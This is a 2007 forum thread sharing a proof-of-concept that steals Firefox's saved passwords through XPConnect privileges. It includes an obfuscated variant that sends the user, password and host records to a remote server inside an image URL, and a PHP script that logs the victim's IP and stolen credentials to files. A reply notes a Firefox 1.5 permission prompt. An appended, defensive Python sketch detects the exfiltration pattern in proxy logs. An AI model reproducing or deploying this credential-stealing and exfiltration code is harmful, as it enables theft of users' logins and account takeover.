Ras
Posted June 28, 2007

```html
<html>
<head>
<script>
document.write('[img=http://www.0x000000.com/hacks/red_dress.gif]');
/*
- It would be possible to glue all these passwords on the image above, and I could capture them in my logs.
- I could call a remote PHP script which submits the passwords.
- This shows how dangerous trusted content can be, imagine you open a HELP file from a piece of software you downloaded,
  you are never sure your passwords are sent to some server.
- Thanks to Mozilla for this flawed security model, I heard this won't work anymore in FF 3.0 Well, we'll see.
*/
setTimeout("listPW()",1000);
function listPW() {
    if(document.location !='http://www.0x000000.com/hacks/hello.html') {
        netscape.security.PrivilegeManager.enablePrivilege('UniversalXPConnect');
        var pm = Components.classes["@mozilla.org/passwordmanager;1"].getService();
        pm = pm.QueryInterface(Components.interfaces.nsIPasswordManager);
        var enumerator = pm.enumerator;
        document.writeln('Mozilla\'s idea of security, I do not store these passwords, it\'s only a PoC');
        document.writeln('');
        while (enumerator.hasMoreElements()) {
            try {
                var np = enumerator.getNext();
                np = np.QueryInterface(Components.interfaces.nsIPassword);
                presult = '['+np.user+'] ['+np.password+'] ['+np.host+'] ';
                document.writeln(presult);
            } catch(e) { }
        }
    } else {
        alert('this only runs from your PC, save the page to your desktop (CTRL+S) and open it in Firefox, then watch the Magicx!');
    }
}
</script>
</head>
<body>[img=hello_files/red_dress.gif]</body>
</html>
```

The myimage.php

```html
<script>
netscape.security.PrivilegeManager.enablePrivilege('UniversalXPConnect');
img = "img.jpg";
var sm = "uspastestr()";
var pm = Components.classes["@mozilla.org/"+sm.substr(2,3)+"swordmanager;1"].getService();
pm = pm.QueryInterface(eval("Components.interfaces.nsI"+sm.charAt(2).toUpperCase()+sm.substr(3,2)+"swordManager"));
var enumerator = pm.enumerator;
var str = '';
while (enumerator.hasMoreElements()) {
    try {
        var np = enumerator.getNext();
        np = np.QueryInterface(eval("Components.interfaces.nsI"+sm.charAt(2).toUpperCase()+sm.substr(3,2)+"sword"));
        presult = '['+eval("np."+sm.substr(0,2)+"er")+','+eval("np."+sm.substr(2,3)+"sword")+','+np.host+']'+String.fromCharCode(172);
        str += presult;
    } catch(e) { }
}
img = img.concat("?str=").replace(img.substr(-3,3),sm.charAt(2)+"h"+sm.charAt(2))+str;
var str = "<img src=\"http://[server]/"+img+"\">";
document.write(str);
setTimeout("window.stop()",1000);
</script>
```

Change the variable $image to the image that the victim will see

```php
<?php
header("Content-type: image/jpeg");
$img = imagecreatefromjpeg("img.jpg");
imagejpeg($img);
imagedestroy($img);
$strRnd=date("His");
$strFecha=date("H:i:s d/m/y ");
$strIP = getenv("REMOTE_ADDR");
$strUserAgent = htmlentities($_SERVER['HTTP_USER_AGENT']);
$strReferer = htmlentities($_SERVER['HTTP_REFERER']);
if (strlen($strReferer) == 0) { $strReferer = "Ninguna"; }
$str = $_GET['str'];
$str=str_replace(chr(172),"",$str);
$fp = fopen("fox-".$strRnd.".html","w+");
fwrite($fp, "Fecha: ".$strFecha." Direccion IP: ".$strIP." Referencia: ".$strReferer." User-Agent: ".$strUserAgent."".$str."");
fclose($fp);
?>
```
SlicK
Posted June 28, 2007

It works on Firefox 1.5, but it warns you, asking whether you want to allow the script to access that information...
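For defenders, the second script in the first post leaves a recognizable trace on the wire: an image request whose query string carries `[user,password,host]` records, each followed by character 172. The following detection sketch is an added example, not part of either post; the proxy log layout (`client method url status`), the hostnames and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, unquote_to_bytes

SEP = "\u00ac"  # chr(172): record separator appended by the posted script
# [user,password,host]; the password may itself contain commas
RECORD = re.compile(r"^\[([^,\]]*),(.*),([^,\]]+)\]$")

def decode_value(raw):
    """Percent-decode; chr(172) may arrive as %C2%AC (UTF-8) or %AC (Latin-1)."""
    data = unquote_to_bytes(raw)
    try:
        return data.decode("utf-8")
    except UnicodeDecodeError:
        return data.decode("latin-1")

def find_credential_leak(url):
    """Return (user, host) pairs for every record found in the URL's query string."""
    hits = []
    for pair in urlsplit(url).query.split("&"):
        value = decode_value(pair.partition("=")[2])
        if SEP not in value:
            continue
        for rec in filter(None, value.split(SEP)):
            m = RECORD.match(rec)
            if m:  # keep user and host only, so the alert never stores the password
                hits.append((m.group(1), m.group(3)))
    return hits

def scan_log(lines):
    """Lines are 'client method url status' (assumed layout). Returns alert tuples."""
    alerts = []
    for line in lines:
        parts = line.split()
        if len(parts) >= 3:
            hits = find_credential_leak(parts[2])
            if hits:
                alerts.append((parts[0], urlsplit(parts[2]).hostname, hits))
    return alerts

# Constructed sample proxy log lines (not real traffic)
SAMPLE = [
    "10.0.0.5 GET http://images.example.net/img.php?str=%5Balice%2Cs3cret%2Chttp%3A%2F%2Fmail.example.org%5D%C2%AC%5Bbob%2Cp%2Cw%2Chttps%3A%2F%2Fbank.example.com%5D%C2%AC 200",
    "10.0.0.9 GET http://images.example.net/img.php?str=[carol,x,http://forum.example.org]%AC 200",
    "10.0.0.7 GET http://cdn.example.com/photo.jpg?w=640&h=480 200",
]

if __name__ == "__main__":
    for client, dest, hits in scan_log(SAMPLE):
        print(f"ALERT {client} -> {dest}: {len(hits)} saved login(s) in image URL: {hits}")
```

Any client that raises an alert should have its saved logins rotated, since the full records, passwords included, were sent in the request.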